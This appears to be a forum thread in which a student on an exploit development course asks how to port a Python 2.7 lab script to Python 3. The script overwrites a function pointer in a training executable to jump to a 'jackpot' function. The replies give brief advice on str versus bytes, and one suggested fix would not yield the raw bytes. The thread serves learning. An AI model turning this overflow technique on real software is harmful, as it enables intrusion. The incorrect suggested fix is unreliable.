Need help rewriting python 2.7 Unicode code to work with 3.x

Question

I'm working through an Exploit Development course on Pluralsight and in the lab I'm currently on we are doing a basic function pointer overwrite. The python script for the lab essentially runs the target executable with a 24 byte string input ending with the memory address of the "jackpot" function. Here's the code:

#!/usr/bin/python
import sys
import subprocess
import struct

# 20+4+8+4=36 would overwrite 'r', but we only want to hit the func ptr

jackpot = 0x401591
# we only take 3 of the 4 bytes because strings cannot have a null,
# but will be null terminated terminated to complete the dword address
jackpot_packed = struct.pack('L', jackpot)[0:3]

arg = "A" * 20
arg += jackpot_packed
# or
# arg += "\x91\x15\x40"

subprocess.call(['functionoverwrite.exe', arg])

The script runs without error and works as expected using python 2.7.8, but with 3.7.2 I get this error:

Traceback (most recent call last): File "c:/Users/rossk/Desktop/Pluralsight/Exploit Development/03/demos/lab2/solution/solution.py", line 14, in arg += jackpot_packed TypeError: can only concatenate str (not "bytes") to str

So I've tried commenting out the "arg += jackpot_packed" expression and using the "arg += "\\x91\\x15\\x40" one instead, but apparently that doesn't result in the same string because when I run the script the target executable crashes without calling the jackpot function.

I'm looking for a way to fix this program for python 3. How can this code be rewritten so that it works for 3.x?

Answer 1

In Python 3, there's no implicit conversion between unicode (str) objects and bytes objects. If you know the encoding of the output, you can .decode() it to get a string, or you can turn the \\n you want to add to bytes with "\\n".encode('ascii')

Answer 2

尝试arg + = str（jackpot_packed）